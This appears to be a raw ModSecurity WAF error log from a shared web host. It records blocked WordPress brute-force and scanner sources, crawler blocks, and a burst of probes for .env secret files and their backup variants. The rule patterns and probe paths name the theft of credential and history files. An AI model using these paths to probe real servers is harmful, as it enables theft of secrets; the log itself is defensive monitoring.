[Tue May 26 17:42:52.146301 2026] [security2:error] [pid 924957:tid 925135] [client 223.235.98.214:1216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOROYv2AvxeXULfJdPYAAAADA"]
[Tue May 26 17:42:53.702750 2026] [security2:error] [pid 924957:tid 925209] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOReYv2AvxeXULfJdPhQAAAHo"]
[Tue May 26 17:42:53.885094 2026] [security2:error] [pid 924957:tid 925181] [client 84.37.231.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWOReYv2AvxeXULfJdPgAAAAF4"]
[Tue May 26 17:42:54.083130 2026] [security2:error] [pid 924957:tid 925082] [remote 160.250.186.220:37088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWOReYv2AvxeXULfJdPmAAAAXw"]
[Tue May 26 17:42:54.449003 2026] [security2:error] [pid 924957:tid 925111] [client 103.123.226.10:61001] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/"] [unique_id "ahWORuYv2AvxeXULfJdPoQAAABg"]
[Tue May 26 17:42:54.563026 2026] [security2:error] [pid 924957:tid 925111] [client 103.123.226.10:61001] ModSecurity: Warning. Matched phrase "Masscan" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWORuYv2AvxeXULfJdPoQAAABg"]
[Tue May 26 17:42:54.640097 2026] [security2:error] [pid 924957:tid 925085] [remote 216.73.216.30:11464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWORuYv2AvxeXULfJdPqAAAJX8"]
[Tue May 26 17:42:55.500222 2026] [security2:error] [pid 924957:tid 925112] [client 47.128.40.56:11678] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mail.ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWOR-Yv2AvxeXULfJdPwAAAABk"]
[Tue May 26 17:42:55.650194 2026] [security2:error] [pid 924957:tid 925144] [client 208.84.100.38:2298] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWOR-Yv2AvxeXULfJdPxAAAADk"]
[Tue May 26 17:42:55.709372 2026] [security2:error] [pid 924957:tid 925154] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOR-Yv2AvxeXULfJdPvwAAAEM"]
[Tue May 26 17:42:56.179942 2026] [security2:error] [pid 924957:tid 925124] [client 208.84.100.38:2336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahWOSOYv2AvxeXULfJdP7AAAACU"]
[Tue May 26 17:42:56.250060 2026] [security2:error] [pid 924957:tid 925189] [client 208.84.100.38:2324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahWOSOYv2AvxeXULfJdP7QAAAGY"]
[Tue May 26 17:42:56.251454 2026] [security2:error] [pid 924957:tid 925165] [client 208.84.100.38:2316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahWOSOYv2AvxeXULfJdP7gAAAE4"]
[Tue May 26 17:42:56.359673 2026] [security2:error] [pid 924957:tid 925205] [client 101.47.24.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWOR-Yv2AvxeXULfJdP0AAAAHY"]
[Tue May 26 17:42:58.076211 2026] [security2:error] [pid 924957:tid 925111] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOSeYv2AvxeXULfJdQIAAAABg"]
[Tue May 26 17:42:59.900821 2026] [security2:error] [pid 924957:tid 925011] [remote 216.73.216.30:41377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOS-Yv2AvxeXULfJdQYAAAETU"]
[Tue May 26 17:43:00.353305 2026] [security2:error] [pid 924957:tid 925159] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOS-Yv2AvxeXULfJdQXwAAAEg"]
[Tue May 26 17:43:01.396856 2026] [security2:error] [pid 924957:tid 925103] [client 62.244.225.226:59106] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWOTeYv2AvxeXULfJdQdgAAABA"]
[Tue May 26 17:43:02.654835 2026] [security2:error] [pid 924957:tid 925138] [client 208.84.100.38:53134] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahWOTuYv2AvxeXULfJdQowAAADM"]
[Tue May 26 17:43:02.868094 2026] [security2:error] [pid 924957:tid 925179] [client 208.84.100.38:53308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.backup"] [unique_id "ahWOTuYv2AvxeXULfJdQqgAAAFw"]
[Tue May 26 17:43:02.870740 2026] [security2:error] [pid 924957:tid 925167] [client 208.84.100.38:53266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env~"] [unique_id "ahWOTuYv2AvxeXULfJdQrgAAAFA"]
[Tue May 26 17:43:02.871136 2026] [security2:error] [pid 924957:tid 925110] [client 208.84.100.38:53294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.bak"] [unique_id "ahWOTuYv2AvxeXULfJdQqwAAABc"]
[Tue May 26 17:43:02.872545 2026] [security2:error] [pid 924957:tid 925154] [client 208.84.100.38:53284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.copy"] [unique_id "ahWOTuYv2AvxeXULfJdQrQAAAEM"]
[Tue May 26 17:43:02.872865 2026] [security2:error] [pid 924957:tid 925194] [client 208.84.100.38:53280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.orig"] [unique_id "ahWOTuYv2AvxeXULfJdQrAAAAGs"]
[Tue May 26 17:43:02.872877 2026] [security2:error] [pid 924957:tid 925168] [client 208.84.100.38:53276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.swp"] [unique_id "ahWOTuYv2AvxeXULfJdQsgAAAFE"]
[Tue May 26 17:43:02.872877 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.100.38:53224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahWOTuYv2AvxeXULfJdQsAAAAC8"]
[Tue May 26 17:43:02.873153 2026] [security2:error] [pid 924957:tid 925152] [client 208.84.100.38:53332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local~"] [unique_id "ahWOTuYv2AvxeXULfJdQugAAAEE"]
[Tue May 26 17:43:02.873616 2026] [security2:error] [pid 924957:tid 925173] [client 208.84.100.38:53228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.old"] [unique_id "ahWOTuYv2AvxeXULfJdQswAAAFY"]
[Tue May 26 17:43:02.873652 2026] [security2:error] [pid 924957:tid 925183] [client 208.84.100.38:53336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.orig"] [unique_id "ahWOTuYv2AvxeXULfJdQuAAAAGA"]
[Tue May 26 17:43:02.874379 2026] [security2:error] [pid 924957:tid 925124] [client 208.84.100.38:53242] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.backup"] [unique_id "ahWOTuYv2AvxeXULfJdQsQAAACU"]
[Tue May 26 17:43:02.964613 2026] [security2:error] [pid 924957:tid 925122] [client 208.84.100.38:53346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.copy"] [unique_id "ahWOTuYv2AvxeXULfJdQvgAAACM"]
[Tue May 26 17:43:02.974874 2026] [security2:error] [pid 924957:tid 925155] [client 208.84.100.38:53336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.bak"] [unique_id "ahWOTuYv2AvxeXULfJdQwAAAAEQ"]
[Tue May 26 17:43:02.974881 2026] [security2:error] [pid 924957:tid 925107] [client 208.84.100.38:53434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.orig"] [unique_id "ahWOTuYv2AvxeXULfJdQxAAAABQ"]
[Tue May 26 17:43:02.975477 2026] [security2:error] [pid 924957:tid 925156] [client 208.84.100.38:53228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.old"] [unique_id "ahWOTuYv2AvxeXULfJdQwgAAAEU"]
[Tue May 26 17:43:02.975906 2026] [security2:error] [pid 924957:tid 925151] [client 208.84.100.38:53276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.swp"] [unique_id "ahWOTuYv2AvxeXULfJdQxgAAAEA"]
[Tue May 26 17:43:02.976231 2026] [security2:error] [pid 924957:tid 925142] [client 208.84.100.38:53422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahWOTuYv2AvxeXULfJdQxQAAADc"]
[Tue May 26 17:43:02.976346 2026] [security2:error] [pid 924957:tid 925111] [client 208.84.100.38:53332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahWOTuYv2AvxeXULfJdQwwAAABg"]
[Tue May 26 17:43:02.977074 2026] [security2:error] [pid 924957:tid 925187] [client 208.84.100.38:53224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahWOTuYv2AvxeXULfJdQyAAAAGQ"]
[Tue May 26 17:43:03.160210 2026] [security2:error] [pid 924957:tid 925196] [client 208.84.100.38:53302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpanel.jhonparra.com"] [uri "/___proxy_subdomain_cpanel/.env.local.old"] [unique_id "ahWOT-Yv2AvxeXULfJdQzQAAAG0"]
[Tue May 26 17:43:03.235526 2026] [security2:error] [pid 924957:tid 925100] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOTuYv2AvxeXULfJdQqQAAAA0"]
[Tue May 26 17:43:03.289103 2026] [security2:error] [pid 924957:tid 925136] [client 185.191.171.13:19184] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWOT-Yv2AvxeXULfJdQ1AAAADE"]
[Tue May 26 17:43:03.289219 2026] [security2:error] [pid 924957:tid 925136] [client 185.191.171.13:19184] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahWOT-Yv2AvxeXULfJdQ1AAAADE"]
[Tue May 26 17:43:03.740135 2026] [security2:error] [pid 924957:tid 925119] [client 85.208.96.206:58142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/ajax.php"] [unique_id "ahWOT-Yv2AvxeXULfJdQ3wAAACA"]
[Tue May 26 17:43:03.740267 2026] [security2:error] [pid 924957:tid 925119] [client 85.208.96.206:58142] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/ajax.php"] [unique_id "ahWOT-Yv2AvxeXULfJdQ3wAAACA"]
[Tue May 26 17:43:03.847980 2026] [security2:error] [pid 924957:tid 925121] [client 147.53.112.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOT-Yv2AvxeXULfJdQ5QAAACI"], referer: https://www.anujtradingco.com/
[Tue May 26 17:43:04.672076 2026] [security2:error] [pid 924957:tid 925035] [remote 216.73.216.30:41377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOUOYv2AvxeXULfJdRAwAAfU0"]
[Tue May 26 17:43:05.481077 2026] [security2:error] [pid 924957:tid 925203] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOUeYv2AvxeXULfJdREQAAAHQ"]
[Tue May 26 17:43:06.406923 2026] [security2:error] [pid 924957:tid 925057] [remote 142.93.171.165:36886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.171.93.142.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWOUuYv2AvxeXULfJdRLAAAO2M"]
[Tue May 26 17:43:06.661436 2026] [security2:error] [pid 924957:tid 925059] [remote 154.66.198.148:14592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWOUuYv2AvxeXULfJdROgAAI2U"]
[Tue May 26 17:43:06.777494 2026] [security2:error] [pid 924957:tid 925188] [client 147.53.112.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWOUuYv2AvxeXULfJdRPgAAAGU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285566&moderation-hash=7f85ecc227fc3dff66757850276581e5
[Tue May 26 17:43:07.213275 2026] [security2:error] [pid 924957:tid 925061] [remote 193.42.61.12:56668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWOU-Yv2AvxeXULfJdRSAAAHGc"]
[Tue May 26 17:43:07.986003 2026] [security2:error] [pid 924957:tid 925126] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOU-Yv2AvxeXULfJdRXQAAACc"]
